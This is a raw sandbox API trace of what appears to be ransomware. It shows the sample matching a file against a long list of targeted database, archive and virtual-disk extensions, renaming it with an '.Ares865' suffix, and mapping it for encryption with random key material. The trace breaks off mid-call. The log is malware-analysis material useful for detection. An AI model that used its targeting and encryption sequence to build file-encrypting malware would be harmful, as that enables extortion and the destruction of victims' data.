returned="MS.OUTLOOK.14.1033.hxn" [0083.500] lstrlenW (lpString="MS.OUTLOOK.14.1033.hxn") returned 22 [0083.500] lstrlenW (lpString="Ares865") returned 7 [0083.500] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.500] lstrlenW (lpString=".dll") returned 4 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2=".dll") returned 1 [0083.500] lstrlenW (lpString=".lnk") returned 4 [0083.500] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2=".lnk") returned 1 [0083.501] lstrlenW (lpString=".ini") returned 4 [0083.501] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2=".ini") returned 1 [0083.501] lstrlenW (lpString=".sys") returned 4 [0083.501] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2=".sys") returned 1 [0083.501] lstrlenW (lpString="MS.OUTLOOK.14.1033.hxn") returned 22 [0083.501] lstrlenW (lpString="bak") returned 3 [0083.501] lstrcmpiW (lpString1="hxn", lpString2="bak") returned 1 [0083.501] lstrlenW (lpString="ba_") returned 3 [0083.501] lstrcmpiW (lpString1="hxn", lpString2="ba_") returned 1 [0083.501] lstrlenW (lpString="dbb") returned 3 [0083.501] lstrcmpiW (lpString1="hxn", lpString2="dbb") returned 1 [0083.501] lstrlenW (lpString="vmdk") returned 4 [0083.501] lstrcmpiW (lpString1=".hxn", lpString2="vmdk") returned -1 [0083.501] lstrlenW (lpString="rar") returned 3 [0083.501] lstrcmpiW (lpString1="hxn", lpString2="rar") returned -1 [0083.501] lstrlenW (lpString="zip") returned 3 [0083.501] lstrcmpiW (lpString1="hxn", lpString2="zip") returned -1 [0083.501] lstrlenW (lpString="tgz") returned 3 [0083.501] lstrcmpiW (lpString1="hxn", lpString2="tgz") returned -1 [0083.501] lstrlenW (lpString="vbox") returned 4 [0083.501] lstrcmpiW (lpString1=".hxn", lpString2="vbox") returned -1 [0083.501] lstrlenW (lpString="vdi") returned 3 [0083.501] lstrcmpiW (lpString1="hxn", lpString2="vdi") returned -1 [0083.501] lstrlenW (lpString="vhd") returned 3 [0083.501] lstrcmpiW (lpString1="hxn", lpString2="vhd") returned -1 [0083.501] lstrlenW (lpString="vhdx") returned 4 [0083.501] lstrcmpiW (lpString1=".hxn", lpString2="vhdx") returned -1 [0083.501] lstrlenW (lpString="avhd") returned 4 [0083.501] lstrcmpiW (lpString1=".hxn", lpString2="avhd") returned -1 [0083.501] lstrlenW (lpString="db") returned 2 [0083.502] lstrcmpiW (lpString1="xn", lpString2="db") returned 1 [0083.502] lstrlenW (lpString="db2") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="db2") returned 1 [0083.502] lstrlenW (lpString="db3") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="db3") returned 1 [0083.502] lstrlenW (lpString="dbf") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="dbf") returned 1 [0083.502] lstrlenW (lpString="mdf") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="mdf") returned -1 [0083.502] lstrlenW (lpString="mdb") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="mdb") returned -1 [0083.502] lstrlenW (lpString="sql") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="sql") returned -1 [0083.502] lstrlenW (lpString="sqlite") returned 6 [0083.502] lstrcmpiW (lpString1="33.hxn", lpString2="sqlite") returned -1 [0083.502] lstrlenW (lpString="sqlite3") returned 7 [0083.502] lstrcmpiW (lpString1="033.hxn", lpString2="sqlite3") returned -1 [0083.502] lstrlenW (lpString="sqlitedb") returned 8 [0083.502] lstrcmpiW (lpString1="1033.hxn", lpString2="sqlitedb") returned -1 [0083.502] lstrlenW (lpString="xml") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="xml") returned -1 [0083.502] lstrlenW (lpString="$er") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="$er") returned 1 [0083.502] lstrlenW (lpString="4dd") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="4dd") returned 1 [0083.502] lstrlenW (lpString="4dl") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="4dl") returned 1 [0083.502] lstrlenW (lpString="^^^") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="^^^") returned 1 [0083.502] lstrlenW (lpString="abs") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="abs") returned 1 [0083.502] lstrlenW (lpString="abx") returned 3 [0083.502] lstrcmpiW (lpString1="hxn", lpString2="abx") returned 1 [0083.502] lstrlenW (lpString="accdb") returned 5 [0083.502] lstrcmpiW (lpString1="3.hxn", lpString2="accdb") returned -1 [0083.502] lstrlenW (lpString="accdc") returned 5 [0083.502] lstrcmpiW (lpString1="3.hxn", lpString2="accdc") returned -1 [0083.503] lstrlenW (lpString="accde") returned 5 [0083.503] lstrcmpiW (lpString1="3.hxn", lpString2="accde") returned -1 [0083.503] lstrlenW (lpString="accdr") returned 5 [0083.503] lstrcmpiW (lpString1="3.hxn", lpString2="accdr") returned -1 [0083.503] lstrlenW (lpString="accdt") returned 5 [0083.503] lstrcmpiW (lpString1="3.hxn", lpString2="accdt") returned -1 [0083.503] lstrlenW (lpString="accdw") returned 5 [0083.503] lstrcmpiW (lpString1="3.hxn", lpString2="accdw") returned -1 [0083.503] lstrlenW (lpString="accft") returned 5 [0083.503] lstrcmpiW (lpString1="3.hxn", lpString2="accft") returned -1 [0083.503] lstrlenW (lpString="adb") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.503] lstrlenW (lpString="adb") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.503] lstrlenW (lpString="ade") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="ade") returned 1 [0083.503] lstrlenW (lpString="adf") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="adf") returned 1 [0083.503] lstrlenW (lpString="adn") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="adn") returned 1 [0083.503] lstrlenW (lpString="adp") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="adp") returned 1 [0083.503] lstrlenW (lpString="alf") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="alf") returned 1 [0083.503] lstrlenW (lpString="ask") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="ask") returned 1 [0083.503] lstrlenW (lpString="btr") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="btr") returned 1 [0083.503] lstrlenW (lpString="cat") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="cat") returned 1 [0083.503] lstrlenW (lpString="cdb") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="cdb") returned 1 [0083.503] lstrlenW (lpString="ckp") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="ckp") returned 1 [0083.503] lstrlenW (lpString="cma") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="cma") returned 1 [0083.503] lstrlenW (lpString="cpd") returned 3 [0083.503] lstrcmpiW (lpString1="hxn", lpString2="cpd") returned 1 [0083.504] lstrlenW (lpString="dacpac") returned 6 [0083.504] lstrcmpiW (lpString1="33.hxn", lpString2="dacpac") returned -1 [0083.504] lstrlenW (lpString="dad") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dad") returned 1 [0083.504] lstrlenW (lpString="dadiagrams") returned 10 [0083.504] lstrcmpiW (lpString1="4.1033.hxn", lpString2="dadiagrams") returned -1 [0083.504] lstrlenW (lpString="daschema") returned 8 [0083.504] lstrcmpiW (lpString1="1033.hxn", lpString2="daschema") returned -1 [0083.504] lstrlenW (lpString="db-journal") returned 10 [0083.504] lstrcmpiW (lpString1="4.1033.hxn", lpString2="db-journal") returned -1 [0083.504] lstrlenW (lpString="db-shm") returned 6 [0083.504] lstrcmpiW (lpString1="33.hxn", lpString2="db-shm") returned -1 [0083.504] lstrlenW (lpString="db-wal") returned 6 [0083.504] lstrcmpiW (lpString1="33.hxn", lpString2="db-wal") returned -1 [0083.504] lstrlenW (lpString="dbc") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dbc") returned 1 [0083.504] lstrlenW (lpString="dbs") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dbs") returned 1 [0083.504] lstrlenW (lpString="dbt") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dbt") returned 1 [0083.504] lstrlenW (lpString="dbv") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dbv") returned 1 [0083.504] lstrlenW (lpString="dbx") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dbx") returned 1 [0083.504] lstrlenW (lpString="dcb") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dcb") returned 1 [0083.504] lstrlenW (lpString="dct") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dct") returned 1 [0083.504] lstrlenW (lpString="dcx") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dcx") returned 1 [0083.504] lstrlenW (lpString="ddl") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="ddl") returned 1 [0083.504] lstrlenW (lpString="dlis") returned 4 [0083.504] lstrcmpiW (lpString1=".hxn", lpString2="dlis") returned -1 [0083.504] lstrlenW (lpString="dp1") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dp1") returned 1 [0083.504] lstrlenW (lpString="dqy") returned 3 [0083.504] lstrcmpiW (lpString1="hxn", lpString2="dqy") returned 1 [0083.505] lstrlenW (lpString="dsk") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="dsk") returned 1 [0083.505] lstrlenW (lpString="dsn") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="dsn") returned 1 [0083.505] lstrlenW (lpString="dtsx") returned 4 [0083.505] lstrcmpiW (lpString1=".hxn", lpString2="dtsx") returned -1 [0083.505] lstrlenW (lpString="dxl") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="dxl") returned 1 [0083.505] lstrlenW (lpString="eco") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="eco") returned 1 [0083.505] lstrlenW (lpString="ecx") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="ecx") returned 1 [0083.505] lstrlenW (lpString="edb") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="edb") returned 1 [0083.505] lstrlenW (lpString="epim") returned 4 [0083.505] lstrcmpiW (lpString1=".hxn", lpString2="epim") returned -1 [0083.505] lstrlenW (lpString="fcd") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="fcd") returned 1 [0083.505] lstrlenW (lpString="fdb") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="fdb") returned 1 [0083.505] lstrlenW (lpString="fic") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="fic") returned 1 [0083.505] lstrlenW (lpString="flexolibrary") returned 12 [0083.505] lstrcmpiW (lpString1=".14.1033.hxn", lpString2="flexolibrary") returned -1 [0083.505] lstrlenW (lpString="fm5") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="fm5") returned 1 [0083.505] lstrlenW (lpString="fmp") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="fmp") returned 1 [0083.505] lstrlenW (lpString="fmp12") returned 5 [0083.505] lstrcmpiW (lpString1="3.hxn", lpString2="fmp12") returned -1 [0083.505] lstrlenW (lpString="fmpsl") returned 5 [0083.505] lstrcmpiW (lpString1="3.hxn", lpString2="fmpsl") returned -1 [0083.505] lstrlenW (lpString="fol") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="fol") returned 1 [0083.505] lstrlenW (lpString="fp3") returned 3 [0083.505] lstrcmpiW (lpString1="hxn", lpString2="fp3") returned 1 [0083.505] lstrlenW (lpString="fp4") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="fp4") returned 1 [0083.506] lstrlenW (lpString="fp5") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="fp5") returned 1 [0083.506] lstrlenW (lpString="fp7") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="fp7") returned 1 [0083.506] lstrlenW (lpString="fpt") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="fpt") returned 1 [0083.506] lstrlenW (lpString="frm") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="frm") returned 1 [0083.506] lstrlenW (lpString="gdb") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="gdb") returned 1 [0083.506] lstrlenW (lpString="gdb") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="gdb") returned 1 [0083.506] lstrlenW (lpString="grdb") returned 4 [0083.506] lstrcmpiW (lpString1=".hxn", lpString2="grdb") returned -1 [0083.506] lstrlenW (lpString="gwi") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="gwi") returned 1 [0083.506] lstrlenW (lpString="hdb") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="hdb") returned 1 [0083.506] lstrlenW (lpString="his") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="his") returned 1 [0083.506] lstrlenW (lpString="ib") returned 2 [0083.506] lstrcmpiW (lpString1="xn", lpString2="ib") returned 1 [0083.506] lstrlenW (lpString="idb") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="idb") returned -1 [0083.506] lstrlenW (lpString="ihx") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="ihx") returned -1 [0083.506] lstrlenW (lpString="itdb") returned 4 [0083.506] lstrcmpiW (lpString1=".hxn", lpString2="itdb") returned -1 [0083.506] lstrlenW (lpString="itw") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="itw") returned -1 [0083.506] lstrlenW (lpString="jet") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="jet") returned -1 [0083.506] lstrlenW (lpString="jtx") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="jtx") returned -1 [0083.506] lstrlenW (lpString="kdb") returned 3 [0083.506] lstrcmpiW (lpString1="hxn", lpString2="kdb") returned -1 [0083.506] lstrlenW (lpString="kexi") returned 4 [0083.507] lstrcmpiW (lpString1=".hxn", lpString2="kexi") returned -1 [0083.507] lstrlenW (lpString="kexic") returned 5 [0083.507] lstrcmpiW (lpString1="3.hxn", lpString2="kexic") returned -1 [0083.507] lstrlenW (lpString="kexis") returned 5 [0083.507] lstrcmpiW (lpString1="3.hxn", lpString2="kexis") returned -1 [0083.507] lstrlenW (lpString="lgc") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="lgc") returned -1 [0083.507] lstrlenW (lpString="lwx") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="lwx") returned -1 [0083.507] lstrlenW (lpString="maf") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="maf") returned -1 [0083.507] lstrlenW (lpString="maq") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="maq") returned -1 [0083.507] lstrlenW (lpString="mar") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mar") returned -1 [0083.507] lstrlenW (lpString="marshal") returned 7 [0083.507] lstrcmpiW (lpString1="033.hxn", lpString2="marshal") returned -1 [0083.507] lstrlenW (lpString="mas") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mas") returned -1 [0083.507] lstrlenW (lpString="mav") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mav") returned -1 [0083.507] lstrlenW (lpString="maw") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="maw") returned -1 [0083.507] lstrlenW (lpString="mdbhtml") returned 7 [0083.507] lstrcmpiW (lpString1="033.hxn", lpString2="mdbhtml") returned -1 [0083.507] lstrlenW (lpString="mdn") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mdn") returned -1 [0083.507] lstrlenW (lpString="mdt") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mdt") returned -1 [0083.507] lstrlenW (lpString="mfd") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mfd") returned -1 [0083.507] lstrlenW (lpString="mpd") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mpd") returned -1 [0083.507] lstrlenW (lpString="mrg") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mrg") returned -1 [0083.507] lstrlenW (lpString="mud") returned 3 [0083.507] lstrcmpiW (lpString1="hxn", lpString2="mud") returned -1 [0083.508] lstrlenW (lpString="mwb") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="mwb") returned -1 [0083.508] lstrlenW (lpString="myd") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="myd") returned -1 [0083.508] lstrlenW (lpString="ndf") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="ndf") returned -1 [0083.508] lstrlenW (lpString="nnt") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="nnt") returned -1 [0083.508] lstrlenW (lpString="nrmlib") returned 6 [0083.508] lstrcmpiW (lpString1="33.hxn", lpString2="nrmlib") returned -1 [0083.508] lstrlenW (lpString="ns2") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="ns2") returned -1 [0083.508] lstrlenW (lpString="ns3") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="ns3") returned -1 [0083.508] lstrlenW (lpString="ns4") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="ns4") returned -1 [0083.508] lstrlenW (lpString="nsf") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="nsf") returned -1 [0083.508] lstrlenW (lpString="nv") returned 2 [0083.508] lstrcmpiW (lpString1="xn", lpString2="nv") returned 1 [0083.508] lstrlenW (lpString="nv2") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="nv2") returned -1 [0083.508] lstrlenW (lpString="nwdb") returned 4 [0083.508] lstrcmpiW (lpString1=".hxn", lpString2="nwdb") returned -1 [0083.508] lstrlenW (lpString="nyf") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="nyf") returned -1 [0083.508] lstrlenW (lpString="odb") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="odb") returned -1 [0083.508] lstrlenW (lpString="odb") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="odb") returned -1 [0083.508] lstrlenW (lpString="oqy") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="oqy") returned -1 [0083.508] lstrlenW (lpString="ora") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="ora") returned -1 [0083.508] lstrlenW (lpString="orx") returned 3 [0083.508] lstrcmpiW (lpString1="hxn", lpString2="orx") returned -1 [0083.509] lstrlenW (lpString="owc") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="owc") returned -1 [0083.509] lstrlenW (lpString="p96") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="p96") returned -1 [0083.509] lstrlenW (lpString="p97") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="p97") returned -1 [0083.509] lstrlenW (lpString="pan") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="pan") returned -1 [0083.509] lstrlenW (lpString="pdb") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="pdb") returned -1 [0083.509] lstrlenW (lpString="pdm") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="pdm") returned -1 [0083.509] lstrlenW (lpString="pnz") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="pnz") returned -1 [0083.509] lstrlenW (lpString="qry") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="qry") returned -1 [0083.509] lstrlenW (lpString="qvd") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="qvd") returned -1 [0083.509] lstrlenW (lpString="rbf") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="rbf") returned -1 [0083.509] lstrlenW (lpString="rctd") returned 4 [0083.509] lstrcmpiW (lpString1=".hxn", lpString2="rctd") returned -1 [0083.509] lstrlenW (lpString="rod") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="rod") returned -1 [0083.509] lstrlenW (lpString="rodx") returned 4 [0083.509] lstrcmpiW (lpString1=".hxn", lpString2="rodx") returned -1 [0083.509] lstrlenW (lpString="rpd") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="rpd") returned -1 [0083.509] lstrlenW (lpString="rsd") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="rsd") returned -1 [0083.509] lstrlenW (lpString="sas7bdat") returned 8 [0083.509] lstrcmpiW (lpString1="1033.hxn", lpString2="sas7bdat") returned -1 [0083.509] lstrlenW (lpString="sbf") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="sbf") returned -1 [0083.509] lstrlenW (lpString="scx") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="scx") returned -1 [0083.509] lstrlenW (lpString="sdb") returned 3 [0083.509] lstrcmpiW (lpString1="hxn", lpString2="sdb") returned -1 [0083.510] lstrlenW (lpString="sdc") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="sdc") returned -1 [0083.510] lstrlenW (lpString="sdf") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="sdf") returned -1 [0083.510] lstrlenW (lpString="sis") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="sis") returned -1 [0083.510] lstrlenW (lpString="spq") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="spq") returned -1 [0083.510] lstrlenW (lpString="te") returned 2 [0083.510] lstrcmpiW (lpString1="xn", lpString2="te") returned 1 [0083.510] lstrlenW (lpString="teacher") returned 7 [0083.510] lstrcmpiW (lpString1="033.hxn", lpString2="teacher") returned -1 [0083.510] lstrlenW (lpString="tmd") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="tmd") returned -1 [0083.510] lstrlenW (lpString="tps") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="tps") returned -1 [0083.510] lstrlenW (lpString="trc") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="trc") returned -1 [0083.510] lstrlenW (lpString="trc") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="trc") returned -1 [0083.510] lstrlenW (lpString="trm") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="trm") returned -1 [0083.510] lstrlenW (lpString="udb") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="udb") returned -1 [0083.510] lstrlenW (lpString="udl") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="udl") returned -1 [0083.510] lstrlenW (lpString="usr") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="usr") returned -1 [0083.510] lstrlenW (lpString="v12") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="v12") returned -1 [0083.510] lstrlenW (lpString="vis") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="vis") returned -1 [0083.510] lstrlenW (lpString="vpd") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="vpd") returned -1 [0083.510] lstrlenW (lpString="vvv") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="vvv") returned -1 [0083.510] lstrlenW (lpString="wdb") returned 3 [0083.510] lstrcmpiW (lpString1="hxn", lpString2="wdb") returned -1 [0083.511] lstrlenW (lpString="wmdb") returned 4 [0083.511] lstrcmpiW (lpString1=".hxn", lpString2="wmdb") returned -1 [0083.511] lstrlenW (lpString="wrk") returned 3 [0083.511] lstrcmpiW (lpString1="hxn", lpString2="wrk") returned -1 [0083.511] lstrlenW (lpString="xdb") returned 3 [0083.511] lstrcmpiW (lpString1="hxn", lpString2="xdb") returned -1 [0083.511] lstrlenW (lpString="xld") returned 3 [0083.511] lstrcmpiW (lpString1="hxn", lpString2="xld") returned -1 [0083.511] lstrlenW (lpString="xmlff") returned 5 [0083.511] lstrcmpiW (lpString1="3.hxn", lpString2="xmlff") returned -1 [0083.511] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.Ares865") returned 64 [0083.511] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.512] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.512] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=338) returned 1 [0083.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.513] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.513] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.513] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.514] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.516] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.517] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.517] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.517] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.518] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.518] CloseHandle (hObject=0x15c) returned 1 [0083.518] CloseHandle (hObject=0x118) returned 1 [0083.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.518] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26af670, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, 